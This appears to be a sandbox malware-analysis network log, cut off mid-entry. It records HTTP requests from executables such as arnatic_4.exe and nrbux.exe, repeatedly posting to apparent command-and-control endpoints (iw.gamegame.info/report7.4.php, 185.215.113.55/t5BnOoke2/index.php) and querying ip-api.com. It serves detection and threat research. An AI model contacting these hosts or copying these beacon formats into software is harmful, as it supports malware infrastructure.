                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api/fbtime HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:19 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=294199&key=5064a966816af6ace47aab1ab46f52fa
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /api/?sid=294199&key=5064a966816af6ace47aab1ab46f52fa HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:19 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:23 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b4b5db00001649edbe8000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=QfI3XFSe3TXkxsEEFHBkVnPmZ33aBDNIqBWqlQLRJdleIjwK24TK8x%2F2ExB8wetn36%2FMpfdaPa5h02dVLQdM01uo5k1f0acw%2F2WiQ88gvXsD6LVuD5cGx0DUPumuXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668623cfce8b1649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:34 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b4ddbd00007cac29a72000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=A6bn0XJXSH0MzbpNumfGff0h9iu6yQP9wVDy8t7E4P3nqPBm6JSYfZ6nWk3T02iugbmY0DOapvTWdZrQjlzEbXtiulTIK%2BrJy5E3wzumjX7OLUZrmqGLIwaYcHTqcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686240f9be67cac-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/?fields=8198 HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:44 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 58
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 59
                                                                                                                                                                                        X-Rl: 43
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:44 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b507ba000010b9b28d9000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zqJ2it63oY%2BxSFXLJFaUZQW9xajP%2FnIIQAykGgOyVp4hxeJ3HjZ5nSk87uO7pDG5rsBHc6QZG54vds4va05fW6ZEyon4zT6hVQhZhySDM01bIEK2bgPc8ezim37LgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862452cfb410b9-CPH
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:53 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:55 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b5300100007377c3976000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zWcTKeLEC8cBRIqnV9%2FrZDGMrcYSrI0XgEqJDLWfJXqu9cGZ0SrvusZs3wS8oH%2BFplF33R6kPAwCwjmvp2eYxevsvQdgnrvxybOTWyTpYOU9EADb2wIggLmIT9pBoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668624933e497377-CPH
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:26:05 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b5584b00001e5d26bbd000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=BjHu6%2Fcu3ycHXJ9WoJ%2F8F6%2FlDNi8qqY5bqTvKm%2FrSiCtT5nijzdrWO%2Bf4kYIspWJm%2FWI0iTsrUjS7g0DoU%2FXZB6wGWppZaVgOfXpHBfxttqUs%2BUDqgUZNBcMs2N4Eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668624d3ab0e1e5d-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:26:15 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b5803000007cb241a80000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=50F4LQE%2BcwrHES4dvpZMaOz1a47n16f1v8yrdiNScmdFS8MXPiYRLR7asaUjJs7%2FvRoantam%2Bs8lF9gJh0wLj0wVK6qYwujpPg6w41JUM%2F86xg213ns2GuAbsjSbMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668625137bc87cb2-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:26:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b5a8650000736ff6ab8000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ifPHsgqYOUgaxFVuRee%2BWcd2cI67erCLc1y3XRQB2%2F5C0wO7CAgGm0l9i0Poy9iliVLoZHeNZUUh9aLUzqFYEn69%2FP%2FZqqsXLOvLofAoFqpE8Xi3BIffjCnyAhNnHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862553d9a0736f-CPH
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:26:36 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b5d28a0000fa686f319000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=8u3RH176T3Y4uT0UE9wA78BCBBN6NDn8v%2B5WnWVTCFmbuswQtorl43qopxZVXvt6EoEt4EpPFX60%2FeGeFVu7%2BteJMY2HO%2FBS2exFHxc8ZT6fY05R1PA%2F%2BcGW33QX2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668625974d86fa68-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:26:47 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b5fbe70000d8f12a238000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=yHVfooORu3z%2FtJuA7CuDgwAAhGt5ja12SmiaseOwIk94v6YPdKdjSa4u4qOMp0fwbW%2FGw82lOFZNfMMcBwofOGsxMz1zeEyLR986ahrTijqACuVLMJ5w2g4c8QYQ%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668625d97ee8d8f1-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:26:53 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
